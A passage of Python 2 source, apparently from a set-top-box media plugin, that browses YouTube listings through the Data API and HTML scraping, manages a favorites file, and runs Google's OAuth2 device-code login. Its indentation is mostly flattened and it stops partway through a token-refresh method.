MPScreen.__init__(self, session, skin='MP_PluginDescr')
ThumbsHelper.__init__(self)
self.favoGenre = self.genreName.startswith(_('Favorites'))
self.apiUrl = 'gdata.youtube.com' in self.stvLink
self.apiUrlv3 = 'googleapis.com' in self.stvLink
self.ajaxUrl = '/c4_browse_ajax' in self.stvLink
self.c4_browse_ajax = ''
self.url_c4_browse_ajax_list = ['']
self["actions"] = ActionMap(["MP_Actions2", "MP_Actions"], {
"ok" : self.keyOK,
"red" : self.keyRed,
"cancel" : self.keyCancel,
"5" : self.keyShowThumb,
"up" : self.keyUp,
"down" : self.keyDown,
"right" : self.keyRight,
"left" : self.keyLeft,
"upUp" : self.key_repeatedUp,
"rightUp" : self.key_repeatedUp,
"leftUp" : self.key_repeatedUp,
"downUp" : self.key_repeatedUp,
"upRepeated" : self.keyUpRepeated,
"downRepeated" : self.keyDownRepeated,
"rightRepeated" : self.keyRightRepeated,
"leftRepeated" : self.keyLeftRepeated,
"nextBouquet" : self.keyPageUpFast,
"prevBouquet" : self.keyPageDownFast,
"green" : self.keyGreen,
"0" : self.closeAll,
"1" : self.key_1,
"3" : self.key_3,
"4" : self.key_4,
"6" : self.key_6,
"7" : self.key_7,
"9" : self.key_9
}, -1)
self['title'] = Label(title)
self['ContentTitle'] = Label(self.genreName)
if not self.favoGenre:
self['F2'] = Label(_("Favorite"))
else:
self['F2'] = Label(_("Delete"))
if ('order=' in self.stvLink) and ('type=video' in self.stvLink) or (self.apiUrl and '/uploads' in self.stvLink):
self['F1'] = Label(_("Sort by"))
self.key_sort = True
else:
self['F1'] = Label(_("Exit"))
self.key_sort = False
self['Page'] = Label(_("Page:"))
self['coverArt'].hide()
self.coverHelper = CoverHelper(self['coverArt'])
self.propertyImageUrl = None
self.keyLocked = True
self.baseUrl = "https://www.youtube.com"
self.lastUrl = None
self.setVideoPrio()
self.favo_path = config.mediaportal.watchlistpath.value + "mp_yt_favorites.xml"
self.keckse = CookieJar()
self.filmliste = []
self.start_idx = 1
self.max_res = int(config.mediaportal.youtube_max_items_pp.value)
self.max_pages = 1000 / self.max_res
self.total_res = 0
self.pages = 0
self.page = 0
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.load_more_href = None
self.onClose.append(self.youtubeExit)
self.modeShowThumb = 1
self.playAll = True
self.showCover = False
self.lastCover = ""
self.actType = None
if not self.apiUrl:
self.onLayoutFinish.append(self.loadPageData)
else:
self.onLayoutFinish.append(self.checkAPICallv2)
def checkAPICallv2(self):
m = re.search('/api/users/(.*?)/uploads\?', self.stvLink, re.S)
if m:
if m.group(1).startswith('PL'):
self.stvLink = "https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&order=date&playlistId=%s&key=%s" % (m.group(1), APIKEYV3)
self.apiUrl = False
self.apiUrlv3 = True
elif not m.group(1).startswith('UC'):
url = 'https://www.googleapis.com/youtube/v3/channels?part=contentDetails&forUsername=%s&key=%s' % (m.group(1), APIKEYV3)
return twAgentGetPage(url, agent=agent, headers=self.headers).addCallback(self.parsePlaylistId).addErrback(self.dataError)
else:
self.apiUrl = False
self.apiUrlv3 = True
self.stvLink = 'https://www.googleapis.com/youtube/v3/search?part=snippet&order=date&channelId=%s&key=%s' % (m.group(1), APIKEYV3)
reactor.callLater(0, self.loadPageData)
def parsePlaylistId(self, data):
data = json.loads(data)
try:
plid = data['items'][0]['contentDetails']['relatedPlaylists']['uploads']
except:
printl('No PLID found.',self,'E')
else:
self.stvLink = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&order=date&playlistId=%s&key=%s' % (str(plid), APIKEYV3)
self.apiUrl = False
self.apiUrlv3 = True
reactor.callLater(0, self.loadPageData)
def loadPageData(self):
if _('No channels found!') in self.genreName:
self.close()
return
self.keyLocked = True
self.ml.setList(map(self.YT_ListEntry, [(_('Please wait...'),'','','','','','')]))
hl = param_ajax_hl[config.mediaportal.yt_param_meta_idx.value]
if hl != picker_lang:
self.setLang("https://www.youtube.com", hl)
return
if self.favoGenre:
self.getFavos()
else:
url = self.stvLink
if self.apiUrlv3:
url = url.replace('%KEY%', APIKEYV3)
url += "&maxResults=%d" % (self.max_res,)
if self.c4_browse_ajax:
url += '&pageToken=' + self.c4_browse_ajax
elif self.ajaxUrl:
if not 'paging=' in url:
url += '&paging=%d' % max(1, self.page)
url = '%s%s' % (self.baseUrl, url)
elif self.c4_browse_ajax:
url = '%s%s' % (self.baseUrl, self.c4_browse_ajax)
else:
if url[-1] == '?' or url[-1] == '&':
url = '%sflow=list' % url
elif url[-1] != '?' or url[-1] != '&':
url = '%s&flow=list' % url
if not '&gl=' in url:
url += self.param_regionid[config.mediaportal.yt_param_regionid_idx.value]
self.lastUrl = url
if self.apiUrlv3 and '%ACT-' in url:
self.actType = re.search('(%ACT-.*?%)', url).group(1)
url = url.replace(self.actType, '', 1)
self.actType = unicode(re.search('%ACT-(.*?)%', self.actType).group(1))
if '%ACCESSTOKEN%' in url:
token = yt_oauth2.getAccessToken()
if not token:
yt_oauth2.refreshToken(self.session).addCallback(self.getData, url).addErrback(self.dataError)
else:
self.getData(token, url)
else:
self.getData(None, url)
def setLang(self, url, hl):
picker_url = "https://www.youtube.com/picker_ajax?action_language=1&base_url=" + urllib.quote(url)
twAgentGetPage(picker_url, cookieJar=self.keckse, agent=agent, headers=self.headers).addCallback(self.gotPickerData, hl).addErrback(self.dataError)
def gotPickerData(self, data, hl):
global picker_lang
try:
data = json.loads(data)["html"].encode('utf-8')
m = re.search('<form(.*?)</form>', data, re.S)
action_url = self.baseUrl + re.search('action="(.*?)"', m.group(1)).group(1).replace('&', '&')
base_url = re.search('<input.*?name="base_url" value="(.*?)"', m.group(1)).group(1).replace('&', '&')
session_token = re.search('<input.*?name="session_token" value="(.*?)"', m.group(1)).group(1)
except:
print 'html:',data
else:
picker_lang = hl
postdata = urllib.urlencode({
'base_url': base_url,
'session_token': session_token,
'hl': hl})
headers = self.headers.copy()
headers['Content-Type'] = 'application/x-www-form-urlencoded'
twAgentGetPage(action_url, method='POST', cookieJar=self.keckse, agent=agent, headers=headers, postdata=postdata).addCallback(lambda _: self.loadPageData()).addErrback(self.pickerError)
def pickerError(self, err):
printl('pickerError:%s' % err,self,'E')
def getData(self, token, url):
if token:
url = url.replace('%ACCESSTOKEN%', token, 1)
if '%playlistId=' in url:
return self.getRelatedUserPL(url, token)
twAgentGetPage(url, cookieJar=self.keckse, agent=agent, headers=self.headers).addCallback(self.genreData).addErrback(self.dataError)
def getRelatedUserPL(self, url, token):
pl = re.search('%playlistId=(.*?)%', url).group(1)
yt_url = re.sub('%playlistId=.*?%', '', url, 1)
twAgentGetPage(yt_url, cookieJar=self.keckse, agent=agent, headers=self.headers).addCallback(self.parseRelatedPL, token, pl).addErrback(self.dataError)
def parseRelatedPL(self, data, token, pl):
try:
data = json.loads(data)
except:
pass
else:
for item in data.get('items', {}):
playlist = item['contentDetails']['relatedPlaylists']
if pl in playlist:
yt_url = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&playlistId=%s&access_token=%s&order=date' % (str(playlist[pl]), token)
return twAgentGetPage(yt_url, cookieJar=self.keckse, agent=agent, headers=self.headers).addCallback(self.genreData).addErrback(self.dataError)
reactor.callLater(0, self.genreData, '')
def parsePagingUrl(self, data):
regex = re.compile('data-uix-load-more-href="(.*?)"')
m = regex.search(data)
if m:
if not self.page:
self.page = 1
self.c4_browse_ajax = m.group(1).replace('&', '&')
else:
if not 'load-more-text' in data:
self.c4_browse_ajax = ''
self.pages = self.page
def parsePagingUrlv3(self, jdata):
if not self.page:
self.page = 1
self.c4_browse_ajax = str(jdata.get('nextPageToken', ''))
def genreData(self, data):
if self.apiUrlv3:
data = json.loads(data)
self.parsePagingUrlv3(data)
elif not self.apiUrl:
try:
if "load_more_widget_html" in data:
data = json.loads(data)
self.parsePagingUrl(data["load_more_widget_html"].replace("\\n","").replace("\\","").encode('utf-8'))
data = data["content_html"].replace("\\n","").replace("\\","").encode('utf-8')
else:
data = json.loads(data)["content_html"].replace("\\n","").replace("\\","").encode('utf-8')
self.parsePagingUrl(data)
except:
self.parsePagingUrl(data)
elif not self.pages:
m = re.search('totalResults>(.*?)</', data)
if m:
a = int(m.group(1))
self.pages = a // self.max_res
if a % self.max_res:
self.pages += 1
if self.pages > self.max_pages:
self.pages = self.max_pages
self.page = 1
self.filmliste = []
if self.apiUrlv3:
def getThumbnail(thumbnails):
if 'standard' in thumbnails:
return str(thumbnails['standard']['url'])
elif 'high' in thumbnails:
return str(thumbnails['high']['url'])
elif 'medium' in thumbnails:
return str(thumbnails['medium']['url'])
else:
return str(thumbnails['default']['url'])
listType = re.search('ItemList|subscriptionList|activityList|playlistList|CategoryList|channelList', data.get('kind', '')) != None
for item in data.get('items', []):
if not listType:
kind = item['id'].get('kind')
else:
kind = item.get('kind')
if kind != None:
if item.has_key('snippet'):
localized = item['snippet'].has_key('localized')
if not localized:
title = str(item['snippet'].get('title', ''))
desc = str(item['snippet'].get('description', ''))
else:
loca = item['snippet']['localized']
title = str(loca.get('title', ''))
desc = str(loca.get('description', ''))
if kind.endswith('#video'):
try:
url = str(item['id']['videoId'])
img = getThumbnail(item['snippet']['thumbnails'])
except:
pass
else:
self.filmliste.append(('', title, url, img, desc, '', ''))
elif kind.endswith('#playlistItem'):
try:
url = str(item['snippet']['resourceId']['videoId'])
img = getThumbnail(item['snippet']['thumbnails'])
except:
pass
else:
self.filmliste.append(('', title, url, img, desc, '', ''))
elif kind.endswith('channel'):
if listType:
id = str(item['id'])
url = '/channel/%s/featured' % id
img = getThumbnail(item['snippet']['thumbnails'])
self.filmliste.append(('', title, url, img, desc, '', ''))
else:
url = str(item['id']['channelId'])
img = getThumbnail(item['snippet']['thumbnails'])
self.filmliste.append(('', title, url, img, desc, 'CV3', ''))
elif kind.endswith('#playlist'):
if not listType:
url = str(item['id']['playlistId'])
else:
url = str(item['id'])
img = getThumbnail(item['snippet']['thumbnails'])
self.filmliste.append(('', title, url, img, desc, 'PV3', ''))
elif kind.endswith('#subscription'):
url = str(item['snippet']['resourceId']['channelId'])
img = getThumbnail(item['snippet']['thumbnails'])
self.filmliste.append(('', title, url, img, desc, 'CV3', ''))
elif kind.endswith('#guideCategory'):
url = str(item['id'])
img = ''
self.filmliste.append(('', title, url, img, desc, 'GV3', ''))
elif kind.endswith('#activity'):
desc = str(item['snippet'].get('description', ''))
if item['snippet'].get('type') == self.actType:
try:
if self.actType == u'upload':
url = str(item['contentDetails'][self.actType]['videoId'])
else:
url = str(item['contentDetails'][self.actType]['resourceId']['videoId'])
img = getThumbnail(item['snippet']['thumbnails'])
except:
pass
else:
self.filmliste.append(('', title, url, img, desc, '', ''))
elif 'contentDetails' in item:
details = item['contentDetails']
if kind.endswith('#channel'):
if 'relatedPlaylists' in details:
for k, v in details['relatedPlaylists'].iteritems():
url = str(v)
img = ''
desc = ''
self.filmliste.append(('', str(k).title(), url, img, desc, 'PV3', ''))
else:
data = data.replace('\n', '')
entrys = None
list_item_cont = branded_item = shelf_item = yt_pl_thumb = list_item = pl_video_yt_uix_tile = yt_lockup_video = False
if self.genreName.endswith("Channels") and "branded-page-related-channels-item" in data:
branded_item = True
entrys = data.split("branded-page-related-channels-item")
elif "channels-browse-content-list-item" in data:
list_item = True
entrys = data.split("channels-browse-content-list-item")
elif "browse-list-item-container" in data:
list_item_cont = True
entrys = data.split("browse-list-item-container")
elif re.search('[" ]+shelf-item[" ]+', data):
shelf_item = True
entrys = data.split("shelf-item ")
elif "yt-pl-thumb " in data:
yt_pl_thumb = True
entrys = data.split("yt-pl-thumb ")
elif "pl-video yt-uix-tile " in data:
pl_video_yt_uix_tile = True
entrys = data.split("pl-video yt-uix-tile ")
elif "yt-lockup-video " in data:
yt_lockup_video = True
entrys = data.split("yt-lockup-video ")
if entrys and not self.propertyImageUrl:
m = re.search('"appbar-nav-avatar" src="(.*?)"', entrys[0])
property_img = m and m.group(1)
if property_img:
if property_img.startswith('//'):
property_img = 'http:' + property_img
self.propertyImageUrl = property_img
if list_item_cont or branded_item or shelf_item or list_item or yt_pl_thumb or pl_video_yt_uix_tile or yt_lockup_video:
for entry in entrys[1:]:
if 'data-item-type="V"' in entry:
vidcnt = '[Paid Content] '
elif 'data-title="[Private' in entry:
vidcnt = '[private Video] '
else:
vidcnt = ''
gid = 'S'
m = re.search('href="(.*?)" class=', entry)
vid = m and m.group(1).replace('&','&')
if not vid:
continue
if branded_item and not '/SB' in vid:
continue
img = title = ''
if '<span class="" ' in entry:
m = re.search('<span class="" .*?>(.*?)</span>', entry)
if m:
title += decodeHtml(m.group(1))
elif 'dir="ltr" title="' in entry:
m = re.search('dir="ltr" title="(.+?)"', entry, re.DOTALL)
if m:
title += decodeHtml(m.group(1).strip())
m = re.search('data-thumb="(.*?)"', entry)
img = m and m.group(1)
else:
m = re.search('dir="ltr".*?">(.+?)</a>', entry, re.DOTALL)
if m:
title += decodeHtml(m.group(1).strip())
m = re.search('data-thumb="(.*?)"', entry)
img = m and m.group(1)
if not img:
img = self.propertyImageUrl
if img and img.startswith('//'):
img = 'http:' + img
img = img.replace('&','&')
desc = ''
if not vidcnt and 'list=' in vid and not '/videos?' in self.stvLink:
m = re.search('formatted-video-count-label">\s+<b>(.*?)</b>', entry)
if m:
vidcnt = '[%s Videos] ' % m.group(1)
elif vid.startswith('/watch?'):
if not vidcnt:
vid = re.search('v=(.+)', vid).group(1)
gid = ''
m = re.search('video-time">(.+?)<', entry)
if m:
dura = m.group(1)
if len(dura)==4:
vtim = '0:0%s' % dura
elif len(dura)==5:
vtim = '0:%s' % dura
else:
vtim = dura
vidcnt = '[%s] ' % vtim
m = re.search('data-name=.*?>(.*?)</.*?<li>(.*?)</li>\s+</ul>', entry)
if m:
desc += 'von ' + decodeHtml(m.group(1)) + ' · ' + m.group(2).replace('</li>', ' ').replace('<li>', '· ') + '\n'
m = re.search('dir="ltr">(.+?)</div>', entry)
if (shelf_item or list_item_cont) and not desc and not m:
m = re.search('shelf-description.*?">(.+?)</div>', entry)
if m:
desc += decodeHtml(m.group(1).strip())
splits = desc.split('<br />')
desc = ''
for split in splits:
if not '<a href="' in split:
desc += split + '\n'
if list_item and not vidcnt:
m = re.search('yt-lockup-meta-info"><li>(.*?)</ul>', entry)
if m:
vidcnt = re.sub('<.*?>', '', m.group(1))
vidcnt = '[%s] ' % vidcnt
self.filmliste.append((vidcnt, str(title), vid, img, desc, gid, ''))
reactor.callLater(0, self.checkListe)
def checkListe(self):
if len(self.filmliste) == 0:
self.filmliste.append(('',_('No contents / results found!'),'','','','',''))
self.keyLocked = True
if self.page <= 1:
self.page = 0
self.pages = self.page
self.c4_browse_ajax = ''
else:
if not self.page:
self.page = self.pages = 1
menu_len = len(self.filmliste)
self.keyLocked = False
self.ml.setList(map(self.YT_ListEntry, self.filmliste))
self.th_ThumbsQuery(self.filmliste, 1, 2, 3, None, None, self.page, self.pages, mode=self.modeShowThumb)
self.showInfos()
def dataError(self, error):
self.ml.setList(map(self.YT_ListEntry, [('',_('No contents / results found!'),'','','','','')]))
self['handlung'].setText("")
def showInfos(self):
if (self.c4_browse_ajax and not self.pages) and self.page:
self['page'].setText("%d" % self.page)
else:
self['page'].setText("%d / %d" % (self.page,max(self.page, self.pages)))
stvTitle = self['liste'].getCurrent()[0][1]
stvImage = self['liste'].getCurrent()[0][3]
desc = self['liste'].getCurrent()[0][4]
self['name'].setText(stvTitle)
self['handlung'].setText(desc)
if self.lastCover != stvImage:
self.lastCover = stvImage
self.coverHelper.getCover(stvImage)
def youtubeErr(self, error):
self['handlung'].setText(_("Unfortunately, this video can not be played!\n")+str(error))
def setVideoPrio(self):
self.videoPrio = int(config.mediaportal.youtubeprio.value)
def delFavo(self):
i = self['liste'].getSelectedIndex()
c = j = 0
l = len(self.filmliste)
try:
f1 = open(self.favo_path, 'w')
while j < l:
if j != i:
c += 1
dura = self.filmliste[j][0]
dhTitle = self.filmliste[j][1]
dhVideoId = self.filmliste[j][2]
dhImg = self.filmliste[j][3]
desc = urllib.quote(self.filmliste[j][4])
gid = self.filmliste[j][5]
wdat = '<i>%d</i><n>%s</n><v>%s</v><im>%s</im><d>%s</d><g>%s</g><desc>%s</desc>\n' % (c, dhTitle, dhVideoId, dhImg, dura, gid, desc)
f1.write(wdat)
j += 1
f1.close()
self.getFavos()
except IOError, e:
print "Fehler:\n",e
print "eCode: ",e
self['handlung'].setText(_("Error!\n")+str(e))
f1.close()
def addFavo(self):
dhTitle = self['liste'].getCurrent()[0][1]
dura = self['liste'].getCurrent()[0][0]
dhImg = self['liste'].getCurrent()[0][3]
gid = self['liste'].getCurrent()[0][5]
desc = urllib.quote(self['liste'].getCurrent()[0][4])
dhVideoId = self['liste'].getCurrent()[0][2]
if not self.favoGenre and gid in ('S','P','C'):
dura = ''
dhTitle = self.genreName + ':' + dhTitle
try:
if not fileExists(self.favo_path):
f1 = open(self.favo_path, 'w')
f_new = True
else:
f_new = False
f1 = open(self.favo_path, 'a+')
max_i = 0
if not f_new:
data = f1.read()
for m in re.finditer('<i>(\d*?)</i>.*?<v>(.*?)</v>', data):
v_found = False
i, v = m.groups()
ix = int(i)
if ix > max_i:
max_i = ix
if v == dhVideoId:
v_found = True
if v_found:
f1.close()
self.session.open(MessageBoxExt, _("Favorite already exists"), MessageBoxExt.TYPE_INFO, timeout=5)
return
wdat = '<i>%d</i><n>%s</n><v>%s</v><im>%s</im><d>%s</d><g>%s</g><desc>%s</desc>\n' % (max_i + 1, dhTitle, dhVideoId, dhImg, dura, gid, desc)
f1.write(wdat)
f1.close()
self.session.open(MessageBoxExt, _("Favorite added"), MessageBoxExt.TYPE_INFO, timeout=5)
except IOError, e:
print "Fehler:\n",e
print "eCode: ",e
self['handlung'].setText(_("Error!\n")+str(e))
f1.close()
def getFavos(self):
self.filmliste = []
try:
if not fileExists(self.favo_path):
f_new = True
else:
f_new = False
f1 = open(self.favo_path, 'r')
if not f_new:
data = f1.read()
f1.close()
for m in re.finditer('<n>(.*?)</n><v>(.*?)</v><im>(.*?)</im><d>(.*?)</d><g>(.*?)</g><desc>(.*?)</desc>', data):
n, v, img, dura, gid, desc = m.groups()
if dura and not dura.startswith('['):
dura = '[%s] ' % dura.rstrip()
self.filmliste.append((dura, n, v, img, urllib.unquote(desc), gid, ''))
if len(self.filmliste) == 0:
self.pages = self.page = 0
self.filmliste.append((_('No videos found!'),'','','','','',''))
self.keyLocked = True
if not f_new and len(data) > 0:
os.remove(self.favo_path)
else:
self.pages = self.page = 1
self.keyLocked = False
self.ml.setList(map(self.YT_ListEntry, self.filmliste))
self.showInfos()
except IOError, e:
print "Fehler:\n",e
print "eCode: ",e
self['handlung'].setText(_("Error!\n")+str(e))
f1.close()
def changeSort(self):
list = (
(_("Date"), ("order=date", 0)),
(_("Rating"), ("order=rating", 1)),
(_("Relevance"), ("order=relevance", 2)),
(_("Title"), ("order=title", 3)),
(_("Video count"), ("order=videoCount", 4)),
(_("View count"), ("order=viewCount", 5))
)
self.session.openWithCallback(self.cb_handleSortParam, ChoiceBoxExt, title=_("Sort by"), list = list, selection=config.mediaportal.yt_param_time_idx.value)
def cb_handleSortParam(self, answer):
p = answer and answer[1]
if p != None:
config.mediaportal.yt_param_time_idx.value = p[1]
self.stvLink = re.sub('order=([a-zA-Z]+)', p[0], self.stvLink)
self.keckse.clear()
self.c4_browse_ajax = ''
self.url_c4_browse_ajax_list = ['']
self.page = self.pages = 0
self.loadPageData()
def keyRed(self):
if not self.key_sort:
self.keyCancel()
elif not self.keyLocked:
self.changeSort()
def keyUpRepeated(self):
if self.keyLocked:
return
self['liste'].up()
def keyDownRepeated(self):
if self.keyLocked:
return
self['liste'].down()
def key_repeatedUp(self):
if self.keyLocked:
return
self.showInfos()
def keyLeftRepeated(self):
if self.keyLocked:
return
self['liste'].pageUp()
def keyRightRepeated(self):
if self.keyLocked:
return
self['liste'].pageDown()
def keyUp(self):
if self.keyLocked:
return
i = self['liste'].getSelectedIndex()
if not i:
self.keyPageDownFast()
self['liste'].up()
self.showInfos()
def keyDown(self):
if self.keyLocked:
return
i = self['liste'].getSelectedIndex()
l = len(self.filmliste) - 1
if l == i:
self.keyPageUpFast()
self['liste'].down()
self.showInfos()
def keyTxtPageUp(self):
if self.keyLocked:
return
self['handlung'].pageUp()
def keyTxtPageDown(self):
if self.keyLocked:
return
self['handlung'].pageDown()
def keyPageUpFast(self,step=1):
if self.keyLocked:
return
oldpage = self.page
if not self.c4_browse_ajax and not self.apiUrlv3:
if not self.page or not self.pages:
return
if (self.page + step) <= self.pages:
self.page += step
self.start_idx += self.max_res * step
else:
self.page = 1
self.start_idx = 1
elif self.c4_browse_ajax:
self.url_c4_browse_ajax_list.append(self.c4_browse_ajax)
self.page += 1
else:
return
if oldpage != self.page:
self.loadPageData()
def keyPageDownFast(self,step=1):
if self.keyLocked:
return
oldpage = self.page
if not self.c4_browse_ajax and not self.apiUrlv3:
if not self.page or not self.pages:
return
if (self.page - step) >= 1:
self.page -= step
self.start_idx -= self.max_res * step
else:
self.page = self.pages
self.start_idx = self.max_res * (self.pages - 1) + 1
else:
if self.page <= 1:
return
self.url_c4_browse_ajax_list.pop()
self.c4_browse_ajax = self.url_c4_browse_ajax_list[-1]
self.page -= 1
if oldpage != self.page:
self.loadPageData()
def key_1(self):
self.keyPageDownFast(2)
def keyGreen(self):
if self.keyLocked:
return
if self.favoGenre:
self.delFavo()
else:
self.addFavo()
def key_4(self):
self.keyPageDownFast(5)
def key_7(self):
self.keyPageDownFast(10)
def key_3(self):
self.keyPageUpFast(2)
def key_6(self):
self.keyPageUpFast(5)
def key_9(self):
self.keyPageUpFast(10)
def keyOK(self):
if self.keyLocked:
return
url = self['liste'].getCurrent()[0][2]
gid = self['liste'].getCurrent()[0][5]
if gid == 'P' or gid == 'C':
dhTitle = 'Videos: ' + self['liste'].getCurrent()[0][1]
genreurl = self['liste'].getCurrent()[0][2]
if genreurl.startswith('http'):
genreurl = genreurl.replace('v=2', '')
else:
genreurl = 'gdata.youtube.com/feeds/api/playlists/'+self['liste'].getCurrent()[0][2]+'?'
dhTitle = 'Videos: ' + self['liste'].getCurrent()[0][1]
if self.favoGenre:
self.session.openWithCallback(self.getFavos, YT_ListScreen, genreurl, dhTitle)
else:
self.session.open(YT_ListScreen, genreurl, dhTitle)
elif gid == 'CV3':
            dhTitle = 'Results: ' + self['liste'].getCurrent()[0][1]
genreurl = self['liste'].getCurrent()[0][2]
genreurl = 'https://www.googleapis.com/youtube/v3/search?part=snippet%2Cid&type=video&order=date&channelId='+self['liste'].getCurrent()[0][2]+'&key=%KEY%'
if self.favoGenre:
self.session.openWithCallback(self.getFavos, YT_ListScreen, genreurl, dhTitle)
else:
self.session.open(YT_ListScreen, genreurl, dhTitle)
elif gid == 'GV3':
            dhTitle = 'Results: ' + self['liste'].getCurrent()[0][1]
genreurl = self['liste'].getCurrent()[0][2]
hl = param_hl[config.mediaportal.yt_param_meta_idx.value]
genreurl = 'https://www.googleapis.com/youtube/v3/channels?part=snippet&categoryId='+self['liste'].getCurrent()[0][2]+hl+'&key=%KEY%'
if self.favoGenre:
self.session.openWithCallback(self.getFavos, YT_ListScreen, genreurl, dhTitle)
else:
self.session.open(YT_ListScreen, genreurl, dhTitle)
elif gid == 'PV3':
dhTitle = 'Videos: ' + self['liste'].getCurrent()[0][1]
genreurl = self['liste'].getCurrent()[0][2]
genreurl = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&order=date&playlistId='+self['liste'].getCurrent()[0][2]+'&key=%KEY%'
if self.favoGenre:
self.session.openWithCallback(self.getFavos, YT_ListScreen, genreurl, dhTitle)
else:
self.session.open(YT_ListScreen, genreurl, dhTitle)
elif not self.apiUrl or gid == 'S':
global picker_lang
if url.startswith('/playlist?'):
m = re.search('list=(.+)', url)
if m:
url = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&playlistId=%s&order=date&key=' % m.group(1)
url += '%KEY%'
dhTitle = 'Playlist: ' + self['liste'].getCurrent()[0][1]
self.session.open(YT_ListScreen, url, dhTitle)
elif url.startswith('/user/') or url.startswith('/channel/'):
url = url.replace('&', '&')
if '?' in url:
url += '&'
else:
url += '?'
url = self.baseUrl + url
dhTitle = self.genreName + ':' + self['liste'].getCurrent()[0][1]
picker_lang = ''
self.session.open(YT_ListScreen, url, dhTitle)
elif url.startswith('/watch?v='):
if not 'list=' in url or '/videos?' in self.stvLink:
url = re.search('v=(.+)', url).group(1)
listitem = self.filmliste[self['liste'].getSelectedIndex()]
liste = [(listitem[0], listitem[1], url, listitem[3], listitem[4], listitem[5], listitem[6])]
self.session.openWithCallback(
self.setVideoPrio,
YoutubePlayer,
liste,
0,
playAll = False,
listTitle = self.genreName,
plType='local',
title_inr=1,
showCover=self.showCover
)
else:
url = re.search('list=(.+)', url).group(1)
url = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&playlistId=%s&order=date&key=' % url
url += '%KEY%'
dhTitle = 'Playlist: ' + self['liste'].getCurrent()[0][1]
self.session.open(YT_ListScreen, url, dhTitle)
else:
self.session.openWithCallback(
self.setVideoPrio,
YoutubePlayer,
self.filmliste,
self['liste'].getSelectedIndex(),
playAll = self.playAll,
listTitle = self.genreName,
plType='local',
title_inr=1,
showCover=self.showCover
)
elif not self['liste'].getCurrent()[0][6]:
self.session.openWithCallback(
self.setVideoPrio,
YoutubePlayer,
self.filmliste,
self['liste'].getSelectedIndex(),
playAll = self.playAll,
listTitle = self.genreName,
plType='local',
title_inr=1,
showCover=self.showCover
)
def youtubeExit(self):
self.keckse.clear()
del self.filmliste[:]
class YT_Oauth2:
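    # Implements Google's OAuth2 "device flow" for YouTube access: requestDevCode()
    # asks Google for a device/user code, _pollOauth2Server() polls until the user
    # grants access in a browser, and refreshToken() renews the short-lived access
    # token. Tokens are persisted in TOKEN_PATH.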
OAUTH2_URL = 'https://accounts.google.com/o/oauth2'
CLIENT_ID = mp_globals.yt_i
CLIENT_SECRET = mp_globals.yt_s
SCOPE = '&scope=https://www.googleapis.com/auth/youtube'
GRANT_TYPE = '&grant_type=http://oauth.net/grant_type/device/1.0'
TOKEN_PATH = '/etc/enigma2/mp_yt-access-tokens.json'
accessToken = None
def __init__(self):
import os.path
self._interval = None
self._code = None
self._expiresIn = None
self._refreshTimer = None
self.autoRefresh = False
self.abortPoll = False
self.waitingBox = None
self.session = None
if not config.mediaportal.yt_refresh_token.value:
self._recoverToken()
def _recoverToken(self):
if os.path.isfile(self.TOKEN_PATH):
with open(self.TOKEN_PATH) as data_file:
data = json.load(data_file)
config.mediaportal.yt_refresh_token.value = data['refresh_token'].encode('utf-8')
config.mediaportal.yt_refresh_token.save()
return True
def requestDevCode(self, session):
self.session = session
postData = self.CLIENT_ID + self.SCOPE
twAgentGetPage(self.OAUTH2_URL+'/device/code', method='POST', postdata=postData, headers={'Content-Type': 'application/x-www-form-urlencoded'}).addCallback(self._cb_requestDevCode, False).addErrback(self._cb_requestDevCode)
def _cb_requestDevCode(self, data, error=True):
if error:
self.session.open(MessageBoxExt, _("Error: Unable to request the Device code"), MessageBoxExt.TYPE_ERROR)
printl(_("Error: Unable to request the Device code"),self,'E')
else:
googleData = json.loads(data)
self._interval = googleData['interval']
self._code = '&code=%s' % googleData['device_code'].encode('utf-8')
self._expiresIn = googleData['expires_in']
self.session.openWithCallback(self.cb_request, MessageBoxExt, _("You've to visit:\n{url}\nand enter the code: {code}\nCancel action?").format(url=googleData["verification_url"].encode('utf-8'), code=googleData["user_code"].encode('utf-8')), type = MessageBoxExt.TYPE_YESNO, default = False)
def cb_request(self, answer):
if answer is False:
self.waitingBox = self.session.openWithCallback(self.cb_cancelPoll, MessageBoxExt, _("Waiting for response from the server.\nCancel action?"), type = MessageBoxExt.TYPE_YESNO, default = True, timeout = self._expiresIn - 30)
self.abortPoll = False
reactor.callLater(self._interval, self._pollOauth2Server)
def cb_cancelPoll(self, answer):
if answer is True:
self.abortPoll = True
def _pollOauth2Server(self):
self._tokenExpired()
postData = self.CLIENT_ID + self.CLIENT_SECRET + self._code + self.GRANT_TYPE
twAgentGetPage(self.OAUTH2_URL+'/token', method='POST', postdata=postData, headers={'Content-Type': 'application/x-www-form-urlencoded'}).addCallback(self._cb_poll, False).addErrback(self._cb_poll)
def _cb_poll(self, data, error=True):
if error:
self.waitingBox.cancel()
self.session.open(MessageBoxExt, _('Error: Unable to get tokens!'), MessageBoxExt.TYPE_ERROR)
printl(_('Error: Unable to get tokens!'),self,'E')
else:
try:
tokenData = json.loads(data)
except:
self.waitingBox.cancel()
self.session.open(MessageBoxExt, _('Error: Unable to get tokens!'), MessageBoxExt.TYPE_ERROR)
printl('json data error:%s' % str(data),self,'E')
else:
if not tokenData.get('error',''):
self.accessToken = tokenData['access_token'].encode('utf-8')
                    config.mediaportal.yt_refresh_token.value = tokenData['refresh_token'].encode('utf-8')
config.mediaportal.yt_refresh_token.save()
self._expiresIn = tokenData['expires_in']
self._startRefreshTimer()
f = open(self.TOKEN_PATH, 'w')
f.write(json.dumps(tokenData))
f.close()
self.waitingBox.cancel()
self.session.open(MessageBoxExt, _('Access granted :)\nFor safety you should create backup\'s of enigma2 settings and \'/etc/enigma2/mp_yt-access-tokens.json\'.\nThe tokens are valid until they are revoked in Your Google Account.'), MessageBoxExt.TYPE_INFO)
elif not self.abortPoll:
print tokenData.get('error','').encode('utf-8')
reactor.callLater(self._interval, self._pollOauth2Server)
def refreshToken(self, session, skip=False):
self.session = session
if not skip:
self._tokenExpired()
if config.mediaportal.yt_refresh_token.value:
